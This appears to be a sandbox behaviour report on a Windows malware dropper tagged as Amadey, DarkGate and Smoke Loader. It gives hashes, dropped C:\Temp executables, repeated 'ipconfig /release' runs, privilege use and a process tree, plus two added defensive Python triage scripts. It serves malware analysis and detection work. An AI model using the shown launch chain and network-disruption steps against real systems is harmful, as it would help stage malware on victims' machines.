Analysis

max time kernel: 149s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20250610-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250610-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/07/2025, 05:56

Static task: static1
Behavioral task: behavioral1
Sample: 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe
Resource: win10v2004-20250610-en

General

Target: 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe
Size: 361KB
MD5: 8d6081be15596b9b110b0995ffc40dfc
SHA1: 259450770e007ca32becda53a1d76a55bf22b0c5
SHA256: cafb08a742ddcb1982a652b4fc77a1ef0979e11787749fa46fa3bca63d15a429
SHA512: 9b0beefd51f55bd31cb6be7c98bf3736c2bb1a831f54e1d9cea3607d7fe147125943573952d70853308bf78ec9cb228b8b7e07b66f927a0bcae9eff351f477bd
SSDEEP: 6144:hflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:hflfAsiVGjSGecvX
Malware Config
Signatures
Executes dropped EXE 64 IoCs

pid   Process
3232  aytqljdbvtolgeyw.exe
4756  CreateProcess.exe
868   igbytrljdb.exe
4944  CreateProcess.exe
540   CreateProcess.exe
624   i_igbytrljdb.exe
5184  CreateProcess.exe
1460  nigaysqkid.exe
5740  CreateProcess.exe
984   CreateProcess.exe
1132  i_nigaysqkid.exe
3708  CreateProcess.exe
1404  icavsnlfdx.exe
2872  CreateProcess.exe
5056  CreateProcess.exe
5928  i_icavsnlfdx.exe
3016  CreateProcess.exe
5036  kfdxvpnhfa.exe
3240  CreateProcess.exe
1996  CreateProcess.exe
3824  i_kfdxvpnhfa.exe
5060  CreateProcess.exe
2952  czusmkecxu.exe
4632  CreateProcess.exe
316   CreateProcess.exe
4576  i_czusmkecxu.exe
5608  CreateProcess.exe
768   zurmjecwuo.exe
3528  CreateProcess.exe
5900  CreateProcess.exe
936   i_zurmjecwuo.exe
5368  CreateProcess.exe
2200  rojhbztrlj.exe
5472  CreateProcess.exe
5812  CreateProcess.exe
4696  i_rojhbztrlj.exe
5008  CreateProcess.exe
3604  rojgbztrlj.exe
4224  CreateProcess.exe
4336  CreateProcess.exe
3888  i_rojgbztrlj.exe
6128  CreateProcess.exe
3340  ljdbwtolge.exe
5456  CreateProcess.exe
2828  CreateProcess.exe
5004  i_ljdbwtolge.exe
696   CreateProcess.exe
2312  jdbvtnlgdy.exe
1764  CreateProcess.exe
5872  CreateProcess.exe
5284  i_jdbvtnlgdy.exe
4104  CreateProcess.exe
1840  cavsnlfdxv.exe
1192  CreateProcess.exe
704   CreateProcess.exe
4316  i_cavsnlfdxv.exe
1996  CreateProcess.exe
4716  ifaxsqkica.exe
1540  CreateProcess.exe
4428  CreateProcess.exe
4672  i_ifaxsqkica.exe
5060  CreateProcess.exe
736   fcxvpnhfzx.exe
3296  CreateProcess.exe

38 of the 64 entries are the C:\temp\CreateProcess.exe launcher stub; the rest are the dropper aytqljdbvtolgeyw.exe, twelve <name>.exe / i_<name>.exe pairs, and fcxvpnhfzx.exe. The list stops at 64 entries, so payloads named elsewhere in this report (czurmkecwu, kecwupezwr, hbztrljebw, eywqojgbyt, ytqlidbvtn, gaytqljdbv, aysqkicavs) do not appear here. PIDs 1996 and 5060 are each listed twice (PID reuse during the run).
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

All 43 IoCs are the same event, Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, recorded for each of the following processes:
i_zurmjecwuo.exe, ifaxsqkica.exe, rojhbztrlj.exe, i_nigaysqkid.exe, rojgbztrlj.exe, i_ifaxsqkica.exe, i_czurmkecwu.exe, eywqojgbyt.exe, zurmjecwuo.exe, i_rojhbztrlj.exe, jdbvtnlgdy.exe, cavsnlfdxv.exe, i_hbztrljebw.exe, ytqlidbvtn.exe, aytqljdbvtolgeyw.exe, igbytrljdb.exe, czusmkecxu.exe, ljdbwtolge.exe, i_fcxvpnhfzx.exe, i_eywqojgbyt.exe, gaytqljdbv.exe, i_gaytqljdbv.exe, i_icavsnlfdx.exe, kfdxvpnhfa.exe, i_rojgbztrlj.exe, i_ljdbwtolge.exe, i_jdbvtnlgdy.exe, fcxvpnhfzx.exe, aysqkicavs.exe, IEXPLORE.EXE, i_igbytrljdb.exe, i_cavsnlfdxv.exe, i_kecwupezwr.exe, hbztrljebw.exe, i_ytqlidbvtn.exe, 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe, CreateProcess.exe, icavsnlfdx.exe, i_kfdxvpnhfa.exe, czurmkecwu.exe, kecwupezwr.exe, nigaysqkid.exe, i_czusmkecxu.exe
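IEXPLORE.EXE is in the list above, which illustrates the weakness of this signature on its own: plenty of legitimate software reads the NLS Language key. What makes the hits here worth attention is who reads it, namely executables dropped into C:\Temp (see the process tree). The following Python is an added example, not part of the sandbox report, that parses the report's flattened "Key opened <key> <process>" rows and weights each hit by the reader's image path. The image paths in IMAGE_PATHS are assumptions for the example (the report gives only process names for this signature); the row excerpt is constructed in the report's format and includes one non-language key to show the zero branch.

```python
"""Weight 'Key opened' hits on the NLS Language key by where the reader runs from.

Added example for the System Language Discovery signature; not part of the
sandbox report. The report only names the reading process, so IMAGE_PATHS
supplies assumed image paths: the temp-directory paths follow the process
tree, the browser and svchost paths are assumptions.
"""
import re
from collections import defaultdict

NLS_LANGUAGE_KEY = r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"

# Constructed excerpt in the report's flattened row format.
REPORT_ROWS = (
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_zurmjecwuo.exe "
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE "
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CreateProcess.exe "
    r"Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography svchost.exe "
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aytqljdbvtolgeyw.exe"
)

# Assumed image paths (process name -> path); not taken from the report.
IMAGE_PATHS = {
    "i_zurmjecwuo.exe": r"C:\Temp\i_zurmjecwuo.exe",
    "CreateProcess.exe": r"C:\temp\CreateProcess.exe",
    "aytqljdbvtolgeyw.exe": r"C:\Temp\aytqljdbvtolgeyw.exe",
    "svchost.exe": r"C:\Windows\System32\svchost.exe",
    "IEXPLORE.EXE": r"C:\Program Files\Internet Explorer\IEXPLORE.EXE",
}

# One row: "Key opened \REGISTRY\... <process>"; keys in this report contain no spaces.
ROW_RE = re.compile(r"Key opened (\\REGISTRY\\\S+) (\S+)")

# Locations a dropper typically writes to: C:\Temp, C:\Windows\Temp, %LOCALAPPDATA%\Temp.
TEMP_DIR_RE = re.compile(
    r"^[a-z]:\\(temp|windows\\temp|users\\[^\\]+\\appdata\\local\\temp)\\", re.I)


def parse_rows(text):
    """Return (registry key, process name) pairs from the flattened signature text."""
    return ROW_RE.findall(text)


def score_hit(key, process, image_paths):
    """0: some other key; 1: language key read from a normal program location
    (or an unknown one); 2: language key read by an executable in a temp directory."""
    if key.lower() != NLS_LANGUAGE_KEY.lower():
        return 0
    if TEMP_DIR_RE.match(image_paths.get(process, "")):
        return 2
    return 1


def triage(text, image_paths):
    """Group process names by score so the strongest hits are read first."""
    buckets = defaultdict(list)
    for key, process in parse_rows(text):
        buckets[score_hit(key, process, image_paths)].append(process)
    return dict(buckets)


if __name__ == "__main__":
    for score, names in sorted(triage(REPORT_ROWS, IMAGE_PATHS).items(), reverse=True):
        print(score, ", ".join(names))
```

Run against the constructed rows, the three C:\Temp readers land in bucket 2, IEXPLORE.EXE in bucket 1 and the svchost.exe row in bucket 0; on a real host the path map would come from the process tree or EDR telemetry rather than a literal.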
Gathers network information 2 TTPs 20 IoCs
Uses commandline utility to view network configuration.

pid   Process
2572  ipconfig.exe
4956  ipconfig.exe
2660  ipconfig.exe
1228  ipconfig.exe
4080  ipconfig.exe
2224  ipconfig.exe
4516  ipconfig.exe
4108  ipconfig.exe
1776  ipconfig.exe
3272  ipconfig.exe
4064  ipconfig.exe
5044  ipconfig.exe
2672  ipconfig.exe
3984  ipconfig.exe
5280  ipconfig.exe
4668  ipconfig.exe
4064  ipconfig.exe
2764  ipconfig.exe
5700  ipconfig.exe
4880  ipconfig.exe

Every ipconfig.exe instance in the process tree is run as ipconfig.exe /release, which releases the host's DHCP lease rather than displaying configuration; treat these hits as network disruption as well as discovery. PID 4064 appears twice (PID reuse within the run).
Internet Explorer registry modifications 33 IoCs
All paths are under \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000, written as <USER> below; the process is given in parentheses.

Set value (str)   <USER>\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"   (iexplore.exe)
Set value (data)  <USER>\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1104561260"   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\Main   (IEXPLORE.EXE)
Set value (data)  <USER>\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10b0e83fdfebdb01   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1101904593"   (IEXPLORE.EXE)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\Recovery\AdminActive   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\GPU   (IEXPLORE.EXE)
Key created       <USER>\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage   (iexplore.exe)
Set value (data)  <USER>\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 2084e13fdfebdb01   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\VersionManager   (IEXPLORE.EXE)
Key created       <USER>\Software\Microsoft\Internet Explorer\VersionManager   (iexplore.exe)
Key created       <USER>\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\   (iexplore.exe)
Set value (str)   <USER>\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""   (IEXPLORE.EXE)
Key created       <USER>\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\DomainSuggestion   (iexplore.exe)
Set value (data)  <USER>\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000068216fd883ba504490bcddae6c93ad640000000002000000000010660000000100002000000096a1a64681265f02940a2075b8cccb18f3f56d43448dd07c4582970f165da34a000000000e800000000200002000000016eb7d270451a4d8db8d9221ced1189219eb1dcc1fa40881360880111be80a0a20000000779e38949e613405721d1e028d6b16456eb5d50e2d0c8b919cdaae85ee0e90b140000000f8bd8514ff257648793c3420a6f43ec5025dfebdb506de106542c46c4176de67eb0988521217b5bd7fa73b5905edb93805efeaff0d425819a20671e25e4fdb7a   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983"   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\Main   (iexplore.exe)
Set value (str)   <USER>\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\TabbedBrowsing   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"   (iexplore.exe)
Set value (data)  <USER>\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000068216fd883ba504490bcddae6c93ad640000000002000000000010660000000100002000000067a64d9b7108d05d09608524eac95ad92d8a2750f42b02e66325c5ec4ec2ea24000000000e80000000020000200000000181cfe8fc14c3f5a6ab15c5ccf30dc7f477e28ec3a01692de62ba3bf2792c0e20000000a5fa400c4110b656e6e054d9681f70bd14870cdd3b99c6106d475e3005382475400000005496deb7cd33405dbd5c1acb17afc3146955935b327b05d08a92bdffa40f2fb690899b615bdd204dcb6adb4fcae92a10245bde4c2fd3a790bfbdc8c51fe6fd17   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983"   (IEXPLORE.EXE)
Set value (str)   <USER>\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6A1E55FB-57D2-11F0-9303-DA74FA597C7D} = "0"   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery   (iexplore.exe)
Key created       <USER>\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames   (iexplore.exe)
Set value (int)   <USER>\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458287143"   (iexplore.exe)
Key created       <USER>\Software\Microsoft\Internet Explorer\Main\WindowsSearch   (iexplore.exe)

These are the keys Internet Explorer itself writes on first launch; the only process touching them is the iexplore.exe / IEXPLORE.EXE pair the sample started. The two DecayDateQueue values begin with 01000000d08c9ddf0115d1118c7a00c04fc297eb, the version field and provider GUID that open a DPAPI (CryptProtectData) blob, so they are browser-encrypted state rather than data the sample wrote.
Suspicious behavior: EnumeratesProcesses 64 IoCs

pid   Process
4052  2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe
3232  aytqljdbvtolgeyw.exe

Only these two processes appear; the original list is the same two entries repeated until the 64-entry limit, with PID 4052 accounting for most of them.
Suspicious behavior: LoadsDriver 20 IoCs

pid   Process
656   Process not Found

The same entry 20 times; the sandbox did not resolve a process name for PID 656.
Suspicious use of AdjustPrivilegeToken 19 IoCs

description              pid   Process
Token: SeDebugPrivilege  624   i_igbytrljdb.exe
Token: SeDebugPrivilege  1132  i_nigaysqkid.exe
Token: SeDebugPrivilege  5928  i_icavsnlfdx.exe
Token: SeDebugPrivilege  3824  i_kfdxvpnhfa.exe
Token: SeDebugPrivilege  4576  i_czusmkecxu.exe
Token: SeDebugPrivilege  936   i_zurmjecwuo.exe
Token: SeDebugPrivilege  4696  i_rojhbztrlj.exe
Token: SeDebugPrivilege  3888  i_rojgbztrlj.exe
Token: SeDebugPrivilege  5004  i_ljdbwtolge.exe
Token: SeDebugPrivilege  5284  i_jdbvtnlgdy.exe
Token: SeDebugPrivilege  4316  i_cavsnlfdxv.exe
Token: SeDebugPrivilege  4672  i_ifaxsqkica.exe
Token: SeDebugPrivilege  2228  i_fcxvpnhfzx.exe
Token: SeDebugPrivilege  2788  i_czurmkecwu.exe
Token: SeDebugPrivilege  5204  i_kecwupezwr.exe
Token: SeDebugPrivilege  4784  i_hbztrljebw.exe
Token: SeDebugPrivilege  556   i_eywqojgbyt.exe
Token: SeDebugPrivilege  4704  i_ytqlidbvtn.exe
Token: SeDebugPrivilege  2188  i_gaytqljdbv.exe

Every holder is one of the i_<name>.exe processes started with ups_ins; none of the <name>.exe ups_run payloads enables SeDebugPrivilege.
Suspicious use of FindShellTrayWindow 1 IoCs

pid   Process
5760  iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid   Process
5760  iexplore.exe (2 hits)
3964  IEXPLORE.EXE (2 hits)
Suspicious use of WriteProcessMemory 64 IoCs
<sample> stands for 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe. Identical consecutive rows are collapsed; the hits column gives how many times each appears.

description                        pid   Process                procid_target  hits
PID 4052 wrote to memory of 3232   4052  <sample>               90             3
PID 4052 wrote to memory of 5760   4052  <sample>               91             2
PID 5760 wrote to memory of 3964   5760  iexplore.exe           92             3
PID 3232 wrote to memory of 4756   3232  aytqljdbvtolgeyw.exe   93             3
PID 868 wrote to memory of 4944    868   igbytrljdb.exe         96             3
PID 3232 wrote to memory of 540    3232  aytqljdbvtolgeyw.exe   101            3
PID 3232 wrote to memory of 5184   3232  aytqljdbvtolgeyw.exe   106            3
PID 1460 wrote to memory of 5740   1460  nigaysqkid.exe         108            3
PID 3232 wrote to memory of 984    3232  aytqljdbvtolgeyw.exe   113            3
PID 3232 wrote to memory of 3708   3232  aytqljdbvtolgeyw.exe   115            3
PID 1404 wrote to memory of 2872   1404  icavsnlfdx.exe         117            3
PID 3232 wrote to memory of 5056   3232  aytqljdbvtolgeyw.exe   120            3
PID 3232 wrote to memory of 3016   3232  aytqljdbvtolgeyw.exe   122            3
PID 5036 wrote to memory of 3240   5036  kfdxvpnhfa.exe         124            3
PID 3232 wrote to memory of 1996   3232  aytqljdbvtolgeyw.exe   128            3
PID 3232 wrote to memory of 5060   3232  aytqljdbvtolgeyw.exe   130            3
PID 2952 wrote to memory of 4632   2952  czusmkecxu.exe         132            3
PID 3232 wrote to memory of 316    3232  aytqljdbvtolgeyw.exe   135            3
PID 3232 wrote to memory of 5608   3232  aytqljdbvtolgeyw.exe   139            3
PID 768 wrote to memory of 3528    768   zurmjecwuo.exe         141            3
PID 3232 wrote to memory of 5900   3232  aytqljdbvtolgeyw.exe   144            3
PID 3232 wrote to memory of 5368   3232  aytqljdbvtolgeyw.exe   147            2 (list cut off at 64 entries)

Every target whose parent is visible in the process tree is a direct child of the writer, so these rows record writes made while setting up a newly created child, not injection into a pre-existing process. iexplore.exe (PID 5760) and its child 3964 do not appear in the captured portion of the tree.
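The distinction that matters in this table is whether the writer is the target's parent. The following Python is an added example, not part of the sandbox report, that parses rows in the report's "PID A wrote to memory of B A <process> <procid_target>" form, collapses the repeats into one edge each and labels every edge as child setup or cross-process. SAMPLE_ROWS is a constructed excerpt using the report's PIDs plus one invented target (PID 9999, with a parent other than its writer) to exercise the injection branch; PARENT_OF is the child-to-parent map taken from the process tree, and the function names are mine.

```python
"""Turn WriteProcessMemory rows into writer -> target edges and classify them.

Added example for the WriteProcessMemory table; not part of the sandbox
report. SAMPLE_ROWS is constructed in the report's row format with the
report's PIDs; target 9999 is invented so one edge is cross-process.
"""
import re
from collections import Counter

SAMPLE = "2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe"

# Constructed rows: each CreateProcess-style child gets two or three writes.
SAMPLE_ROWS = " ".join(
    [f"PID 4052 wrote to memory of 3232 4052 {SAMPLE} 90"] * 3
    + [f"PID 4052 wrote to memory of 5760 4052 {SAMPLE} 91"] * 2
    + ["PID 3232 wrote to memory of 4756 3232 aytqljdbvtolgeyw.exe 93"] * 3
    + ["PID 3232 wrote to memory of 9999 3232 aytqljdbvtolgeyw.exe 200"]  # constructed
)

# child pid -> parent pid, from the process tree; 9999 is constructed with a
# parent (4052) that is not the process writing into it (3232).
PARENT_OF = {3232: 4052, 5760: 4052, 4756: 3232, 9999: 4052}

# The writer pid appears twice per row (in the description and the pid column);
# the backreference enforces that they agree.
ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\d+)")


def parse_writes(text):
    """Return (writer_pid, target_pid, writer_image, procid_target) tuples."""
    return [(int(w), int(t), image, int(pt)) for w, t, image, pt in ROW_RE.findall(text)]


def classify(writes, parent_of):
    """Collapse repeated rows into one edge each and label the edge:
    'child-setup'   the writer is the target's parent (normal during process creation)
    'cross-process' the writer did not create the target (injection candidate)"""
    counts = Counter((w, t, image) for w, t, image, _ in writes)
    edges = []
    for (w, t, image), n in counts.items():
        kind = "child-setup" if parent_of.get(t) == w else "cross-process"
        edges.append({"writer": w, "target": t, "image": image, "writes": n, "kind": kind})
    return edges


def injection_candidates(writes, parent_of):
    """Edges worth escalating: writes into a process the writer did not spawn."""
    return [e for e in classify(writes, parent_of) if e["kind"] == "cross-process"]


if __name__ == "__main__":
    for edge in classify(parse_writes(SAMPLE_ROWS), PARENT_OF):
        print(edge)
```

On the report's real rows every edge comes out as child-setup; the constructed 9999 edge is the only one the injection filter returns. A target missing from the parent map is treated as cross-process, which is the safe direction for a triage tool.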
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe"C:\Users\Admin\AppData\Local\Temp\2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Temp\aytqljdbvtolgeyw.exeC:\Temp\aytqljdbvtolgeyw.exe run2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\igbytrljdb.exe ups_run3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4756 -
C:\Temp\igbytrljdb.exeC:\Temp\igbytrljdb.exe ups_run4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:868 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:4944 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:4668
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_igbytrljdb.exe ups_ins3⤵
- Executes dropped EXE
PID:540 -
C:\Temp\i_igbytrljdb.exeC:\Temp\i_igbytrljdb.exe ups_ins4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\nigaysqkid.exe ups_run3⤵
- Executes dropped EXE
PID:5184 -
C:\Temp\nigaysqkid.exeC:\Temp\nigaysqkid.exe ups_run4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:5740 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:4080
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_nigaysqkid.exe ups_ins3⤵
- Executes dropped EXE
PID:984 -
C:\Temp\i_nigaysqkid.exeC:\Temp\i_nigaysqkid.exe ups_ins4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\icavsnlfdx.exe ups_run3⤵
- Executes dropped EXE
PID:3708 -
C:\Temp\icavsnlfdx.exeC:\Temp\icavsnlfdx.exe ups_run4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2872 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2572
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_icavsnlfdx.exe ups_ins3⤵
- Executes dropped EXE
PID:5056 -
C:\Temp\i_icavsnlfdx.exeC:\Temp\i_icavsnlfdx.exe ups_ins4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5928
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\kfdxvpnhfa.exe ups_run3⤵
- Executes dropped EXE
PID:3016 -
C:\Temp\kfdxvpnhfa.exeC:\Temp\kfdxvpnhfa.exe ups_run4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:3240 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2224
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_kfdxvpnhfa.exe ups_ins3⤵
- Executes dropped EXE
PID:1996 -
C:\Temp\i_kfdxvpnhfa.exeC:\Temp\i_kfdxvpnhfa.exe ups_ins4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\czusmkecxu.exe ups_run3⤵
- Executes dropped EXE
PID:5060 -
C:\Temp\czusmkecxu.exeC:\Temp\czusmkecxu.exe ups_run4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:4632 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:4516
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_czusmkecxu.exe ups_ins3⤵
- Executes dropped EXE
PID:316 -
C:\Temp\i_czusmkecxu.exeC:\Temp\i_czusmkecxu.exe ups_ins4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4576
  - C:\temp\CreateProcess.exe C:\Temp\zurmjecwuo.exe ups_run (PID:5608)
    Signatures: Executes dropped EXE
    - C:\Temp\zurmjecwuo.exe ups_run (PID:768)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:3528)
        Signatures: Executes dropped EXE
        - C:\windows\system32\ipconfig.exe /release (PID:5044)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_zurmjecwuo.exe ups_ins (PID:5900)
    Signatures: Executes dropped EXE
    - C:\Temp\i_zurmjecwuo.exe ups_ins (PID:936)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\rojhbztrlj.exe ups_run (PID:5368)
    Signatures: Executes dropped EXE
    - C:\Temp\rojhbztrlj.exe ups_run (PID:2200)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:5472)
        Signatures: Executes dropped EXE
        - C:\windows\system32\ipconfig.exe /release (PID:4956)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_rojhbztrlj.exe ups_ins (PID:5812)
    Signatures: Executes dropped EXE
    - C:\Temp\i_rojhbztrlj.exe ups_ins (PID:4696)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\rojgbztrlj.exe ups_run (PID:5008)
    Signatures: Executes dropped EXE
    - C:\Temp\rojgbztrlj.exe ups_run (PID:3604)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:4224)
        Signatures: Executes dropped EXE
        - C:\windows\system32\ipconfig.exe /release (PID:4064)
          Signatures: Gathers network information
  - C:\temp\CreateProcess.exe C:\Temp\i_rojgbztrlj.exe ups_ins (PID:4336)
    Signatures: Executes dropped EXE
    - C:\Temp\i_rojgbztrlj.exe ups_ins (PID:3888)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  - C:\temp\CreateProcess.exe C:\Temp\ljdbwtolge.exe ups_run (PID:6128)
    Signatures: Executes dropped EXE
    - C:\Temp\ljdbwtolge.exe ups_run (PID:3340)
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release (PID:5456)
        Signatures: Executes dropped EXE
